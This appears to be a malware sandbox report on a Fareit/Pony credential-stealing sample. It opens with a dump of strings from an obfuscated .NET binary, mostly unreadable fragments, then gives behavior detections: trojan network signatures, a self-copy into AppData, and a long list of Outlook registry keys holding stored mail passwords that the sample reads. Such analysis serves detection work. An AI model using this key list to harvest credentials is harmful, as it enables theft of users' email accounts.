#=q4N2IYJkFi2VWiCVDKVND$8gixU$DXUcX8F2LiLBxLHw=
5+?\5
&&*}o
`ZD 86x
- &o
-&{
{
Ph!}'
`> /
R"t/
#=qKY90T141DaVDQT0DHaMEr8C6aPEoolamkqMM94Ir$TE=
advapi32.dll
|Bo6O
#=quRXaU$OHlRs_89kacdiUMQ==
]%
- &{
8of+x%> H
-&o
#=qxybSLhWq6EDNDl0$FuPN8g==
PmFw
F&XI
#=qos7yzAcb5jR$ypc0Qk3OWQ==
System.Runtime.CompilerServices
#=qVcF51voQmyGAgyAUz3313w==
#=qgHxgiBgB0FhzEGOOs2Dqnfh3XnJ7nEmajCNqRqFR3Fg=
SuppressIldasmAttribute
jS'8
IClientAppHost
#=qgbI51haY38WJ4NumXDqnLC_uKv$aRHAyD63c9HgGYzlsFjikAASqT8RCSswEMouz
- &&
&'S!@V-
SByte
@ W \ g l
R.2Z7
^O=r
Bl1[
$94c8727d-349f-48c9-8157-aa2ea8af4be6
-&&
ffeefeffeefhah
#=qKi0KrAcAGUOMcS5S$2tJyg==
- &8
#=q00kXQ$0a$SV9DIgRtf4NWQ==
#=qXOmEbR_8DUzPz6sW4Kmd6kaKUIQOYZdTpvq2CkB17PTlG1zEUgI_P4skJXU2VwtO
_~NZ,b
CZ"
FormWindowState
T@9g5
- ~0
- ~1
!6tG
#=q3rtw1eBB$yyPLXzQW$mDOw==
#=qbmVTgf9cRSZkM_UgFSJrlQ==
#=qWsrg06gTzsE5hhHu57fJFw==
RestoreProtection
TransformFinalBlock
#=qKXWwuvxG9klNObPbc$UF0LIw0aZIk7Z0VPIncl8uFJQ=
Wm0h
%+O8
A8YA
get_AddressList
System.Windows.Forms
YKQu
TW^]
qZ-~g
r,j)
UIntPtr
#=qH7CAcg5aycQv61Wo62XDpw==
#=qglhcKpwNlOshaHMfwiT0UA==
CHqz"
xyp
#=qi1H2yZDbCxvPo0ia9nVnuw==
#=qvz1sVA0ePAgs1nzIHQTFVtjljpeJ1QO1S19vLxn8DMU=
get_StartupPath
#=qK5Mf9uxDCjwDRfyJQ6kp8A==
4gNc
#=qtBt$1AtaHrrce6fc6LOT3axuBNxZ$SQPty78qYGi1os=
AQi.{ "
IDisposable
I ;yv
du
Exists
System.Security.Principal
#=qKU0J1fiP8KA33eFK1owekQ==
&+P~
#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=
tJeG
ReadChar
#=qD_C1_4vUU8j6eQSUvsJDw_O6DZliNi$NDCaON05RwdmBpVqAu68W00hmx80mCKp6
e-O<p
#=qv1Nmoo$HMwdd1A0cX75UdA==
#=q1AWpt7Zq4Tx0wGx4hVFZRg==
OpenRead
jjoi2v\
$4:9G
#=qFTBwGADWl13TibdOa5ODk_Y2qcfMGC4lp4rhrZcE84kZNE6dU4EqEk2ZYKuJAWo9
CompressionMode
E"Vb
W i^
/.ffefefeeffe
@*@z
#=q35mMBfMcRRKrjeZsPOCz3A==
KeepAlive
0s0"^
mdi,1
AssemblyProductAttribute
['/l?
#=q0qLVKF4NbQlcaunYsixITQ==
#=q6CxZjTl3_v2RHWKegcqMWw==
-&&
#=qkcVkJskuGA4o7kGuN79i1w==
Equals
#=qWrm21vQ8CBMZP_RBTwpusA==
#=q3_2_t217j7pS3JjemZNI07w3dukMmHXPSE5$LTnvGS8=
R,7X
<Module>
#=qD4n8L4W9wQXrF7w_31K9bjmy3jeB41mSJJrYkh6lpiE=
# 0H
>JJn0K
'~lh
#=qtS81hD$ORACBvdEkFyqaXA==
d KT=
0a
+O +
#=qNn8WS2rooUJUoMsG84mQ7PkK4IQF8$E42cyDjfL7Kqc=
MulticastDelegate
b`h*&+
#=qYKspnFhL3rrV8a6zSvXJWA==
u =H
#=qPYtEwg1BZk5tP9KKNl$36tqIdWilqjeWcpWKL2Zxnug=
R&$w\
#=qcp_YDS3uDXZMDFWGeFYphA==
#=qGPdnFVTlqnS4tiFpuQulXa$2eC7Pe6YqVeImkUGsMl0=
#=qaysgaPdcuRrUvev6__tYEA==
feffeefefa
(e )
#=qJT4I5hOweIk$xYFEeDszbikglXCuquUd$v9AXtyq2ns=
-,& ~(
l{2@?
_U1W
ToInt32
fefeffefefea
ob3*
jXR^
.B"r*
#=qVqLFp2u1the0Txg1vhieSw==
#=qoGHQsKlZ7jK$YeTeBpzDNYYM4Z1FIrOpXaDV$VTAdfM=
#=qJAZ7is41tIXMNDQIkGLgjRC15Eis_QBrdFx8JT2Rx54=
#=qQ3JMSE9km3mGmL6lmUfRHw==
AP*@
#=q98hMbgVf4fBR3MKeaM4uQI$YRLQdIr1biYYF5369cW8=
#=q6pErmyx6x4$YkotXXEXGCt_ysi5JdNm1fpNgnUvZ9LE6EtA8E0TapqXrPnqyBO1x
#=quebj1wBCmruzAKmg6Y4Igg==
]55][JZ
BinaryWriter
get_UtcNow
#=qQrBlfreeUYUGyN3hPOorGA==
#=qoKFLFqm7bb3VWsU2QKXIQ4_6anGbTCWiZAfrNlgq8fc=
&&*}#
#=qFZLDtLWdUONY4B_gU_jjJi4BgFANcRLPMuWuQINdRLc=
MBTk
#=qgSHqO_KLHRARFg70SGn_Mw==
get_Exists
;;*z
SizeofResource
BuildingHostCache
CreateEncryptor
ProcessWindowStyle
p3R48
&&*}
ThreadExceptionEventHandler
#=qHdV5wMNiXS49lDrqJF3pqA==
&~0
&~1
#=ql4R4vy5H067cy2C3KkF7Mg==
#GUID
#=qhSKaq9YW4A_ja0UC7Difmw==
#=qtxap8xCUFH7z14nNy3cjjw==
- &~7
- &~4
kgL
#=qhme1CFqs_evb4VXik7N4x7lNdqSfuNy3r3OUWZ1V4Zk=
@'@Km
3l+ W
get_Exception
w)H)>9
&&*}n
feffefefea
#=qaCmGqb7phy5lq$DAzhK3vB71XCZSvhKm3BtGKq_xBto=
'{H
&&*}c
&&*}e
%%BN
&&*}X
#=qKxL6kQaUyB_6jIG3mQUGOw==
@JC.qBe/k
#=qrjPq4iPb$PLckcObsgRE1Q==
aS:]
DefaultMemberAttribute
HlL\
T|/?
k}kn
;=a&:Q
<Hcz
#=qxOFsoGbvlBlUujyS9g3fPQ==
Cf,tC
#=qo$DZvhC1PKdsChUToY52NA==
#=q61s8d6EIAdSsDLLjqchw1w==
ToInteger
}]$G
-@qE
Write
@VH4
b+
,yej
{!oB
$}l&UNz
GetFiles
#=qbMe5UnnXEF8aurHaZz6klA==
dTo6m
_XRqo{
Zh#\
-*&
9zf&
#=qs202XG_JxpBwpKhptOZhRA==
9@I.
k1Iv4q
GetPublicKeyToken
#=q_5hmJXim2EG1abw3Kju8nMffXDIbl5na4zXqclsRK_s=
#=qOsu3u3mLIa8ikCCuCoOv_w==
EventHandler
"VHM
-,&s
Thread
b~0d
#=qMWVV4JCreo65oWvwYJqZWobqlgJkr$K2AUIqF$weF5s=
|pe4
#=q1jj2Lo3UBKUZkdI2bLcg4QlXuNGNWZ$CYnK9VTZNEsA=
#=qd3Itd1ELDPHJxhLvt0y1NQ==
#=qoygY$KIlhsLDneTXkJ_L9A==
#=qvPYkN4Wli543LScsy6rh$bZ0bDIN0tYd5zlNUibOEKfBRc13v6NIDRtsxPOZzKpX
Microsoft.VisualBasic.Devices
MyTemplate
C#X
#=qrIbbxniIme2qLTdRw6i0wDoZFMH5BWs03iMeSnjojQU=
#=qb8Z0_4AS4r8OSPknVYvDfA==
''<2^
InsertAce
SetValue
Encoding
y([]
< 3,bDD
\}F2
QueueUserWorkItem
get_TotalMilliseconds
lKj(
SetKernelObjectSecurity
'&5H'X?p
ReadPacket
IEnumerable`1
#=q44BQlEuOnjFd0LbnzKKIIg==
#=q9T406SLBpfhYfDTkCrB28g==
V(g*
#=q2LHISsr6oVwPjyrC2AFTD2_CdAouK60pDkoTs0efRSU=
ObjectFlowControl
z~}
-#&~7
ReadAllText
CIO~yZg
%@(b
?Q<0
I6n>h
H/Up
CheckForSyncLockOnValueType
FrE3#]]
pqMP
#=q2l$b42bR_hlbzUjQTk6vFw==
ReadSByte
#=qfOXLv$ej4ffVoa9QN8Vke8O9DCKhSHEsi_sqFk8Qf0o=
:x!h
H:j*
IClientUIHost
p+v\
j0Eq
z\J^
qAgA?
ToArray
#=q8xbuK7pqyq7mWB67vviBtOo1WSCccuR7xEQnGnyxMyQ=
#=qCJD3QzeNpOG7t7hUNPqgxgwPhMjv4aui2ikN049iz28=
#=qbUu2Y2P9FL2iRkWyb62gww==
fONG
XaY
l;m&
#=qwGYG3$xqr6oMjxRyF4i0Uw==
Replace
#=qFWLbBQgFiIpy22HFbhF9GQ==
#=q0g2hVR4CYkiIvLHeQL6tUkW2KQhRibG1DIo1pReSOj8=
System.ComponentModel
#=qKKJCW_KTAsIH3uNlP3Z4Tg==
LocalMachine
#=qWLKNBubktRcyu8vI4dIAJNOqajvyL7NccmUEC4QD9y8=
-b&&
DEWZ
9<ZJGL%
#=qfjs2lYYPRWKuXjeHrc8Rtg==
#=qHamFicykpD9fQKnU2wtqJw==
D4S
get_MachineName
#=qPbvCT$UNIh_DPMt5F02Hyw==
--<kZ
`2-
5i9~D
0D2T)
TargetInvocationException
oA ,+
-?+
TDN\
K%(L
#=q0FQ_PiagXHm_B8aG8Ji9Dw==
#=qIZP8IX60gSYF82kuZejmg8pOoXfEBczapTTwgrWM$fM=
#=qzzNUaijPluPyLfyxwDObxw==
f/#
#=q_NLac$XJ5lIxZMpXsr_nBw==
#=qlsj4Kl0M6SYgZMJLZ$QkSw==
1B1my
,&+
#=qFlz$$vhlrnZb7YOji0eF_QZBzkOajT0w3UoQbgnXVIA=
#=qGS6wNk5u54YEpqtjtMFIpQ==
#=qvvhgGCgMlZiK63M2bP1Kcg==
Iw@l
,,~M
#=qnnmAgQGEsJw4dsVn9gN4wJbRL4WqsDa_V0QuBPM2E4A=
#=q0EPYqANhk$fGDlTztPFu2jRCdUruoFdUMwStI_GHseI=
System.Collections.Generic
$?I[
/;=<
Compare
W'[W
]]-Qx
Queue`1
#=qOn6YhA2JjwnYZ_7D0fnnEw==
#=qG5YZbexfSlZk_cwFxKFh4HaY$Krp4rK2HdCH8OIs4EI=
#=qXCoQdguduOewiATPKLDvyekx3X3r68VNkZOPBX9O5lY=
- 4 ; U g
VGq
#=qPjPHWXGbaA$51Cna2ZaMpQ==
#=q63A3zH9hQ$3c53x2wqU0Qg==
@?Q<h
#=qibDx9sEkAVZroec7HmNu4g==
ilX[
IClientLoggingHost
#=qcrlhteALkcfYnKFH$UWw$HzZqj8gdN8_KwUKIC_ywUo=
#=q0myQQ6i89t9SZyjYDXZrBLa9ljWEUD7zAwJyyFZowQc=
WriteLine
System.Security.AccessControl
8"EM
0spl
#=qTawRDksY2KFvY5V2vw1_pA==
yVK5v
-b&(?
*N(;
xcR{
#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=
:hu'a
get_InnerException
TP4
-&* +
#=qNzt$mJakh1Nxv4vDRDjTsa1OVDKMAlRCO__qncxMoXRz8jNE7AWvE0B4WIqANR1p
84a8
GeneratedCodeAttribute
}LDX
#=qgCcrNFC0iLB8hKTy5iNnsw==
YK#/81
#=qhg8oaKg1xx$HC$DKnlbXQpibwH2HXqMGSlGv30vEUsU=
2V~s
Remove
#9)B
Y{@&
u{ U
H *.zK
V ^f
7rr(
JAJe
#=qi_z83UuaQZa6UsXCAahbTQ==
Zq{
#=qURIxMOG0HImwEP4A6zEiPg==
-p&~C
#=qTZGarPS37Dw3Z3Ipg_AFug==
#=qXz2OER2RItZOjngvYurWLQ==
]a(k|
+Ih
#=qSoHRCAcaypsR55EueXBy1g==
set_RemoteEndPoint
#=qNZVIIdU4QECigaum94nwLctVkDSuRt$X4_IjuFpWVuY=
#=qAbQ42UrUbGpmkYA2zun7Tg==
&&*}
#=q6V4Kle56uZFNUY$zkrrKJQ==
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
2018-01-14 22:43:04 | 2018-01-14 22:43:04 |
16 Behaviors detected by system signatures
Created network traffic indicative of malicious activity
Severity: High
Confidence: High
- signature: ET TROJAN Fareit/Pony Downloader Checkin 3
- signature: ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98
Anomalous binary characteristics
Severity: High
Confidence: High
- anomaly: Actual checksum does not match that reported in PE header
Creates a slightly modified copy of itself
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Roaming\subfolder\filename.exe
- percent_match: 99
Harvests information related to installed mail clients
Severity: High
Confidence: Very High
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTP Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 User
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTPMail Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Port
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Port
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTPMail Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP User
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Email Address
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP User
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Email Address
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP User
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Port
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTPMail Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTP Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 User
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP User
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTP User
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Port
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Email Address
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTP Server URL
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTP Server URL
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Password2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Email Address
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Email Address
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP User
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTPMail Server
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP User Name
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Password
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTP Server URL
